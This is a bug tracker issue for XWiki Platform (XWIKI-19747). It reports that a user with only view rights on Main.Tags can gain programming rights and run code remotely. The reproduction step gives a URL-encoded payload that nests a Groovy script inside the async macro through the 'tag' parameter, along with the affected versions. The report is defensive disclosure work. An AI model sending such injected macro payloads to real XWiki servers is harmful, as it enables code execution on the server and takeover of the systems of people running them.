Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-19747

Privilege escalation (PR) with view rights on Main.Tags

    XMLWordPrintable

Details

    • High
    • Unknown
    • N/A

    Description

      Steps to reproduce:

      Open <server>/xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D

      Expected result:

      Tags for

      {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}}
      

      are displayed.

      Actual result:

      Tags for hello from groovy! are displayed.

      This demonstrates a privilege escalation attack from view rights on Main.Tags to programming rights. This is also a remote code execution attack.

      This affects most likely all versions of XWiki containing the async macro (version 11.6RC1 and later) that allows to circumvent the script macro nesting protection. Similar attacks might also be possible with the job macro, this is to be verified.

      Attachments

        Issue Links

          Activity

            People

              MichaelHamann Michael Hamann
              MichaelHamann Michael Hamann
              Votes:
              0 Vote for this issue
              Watchers:
              1 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: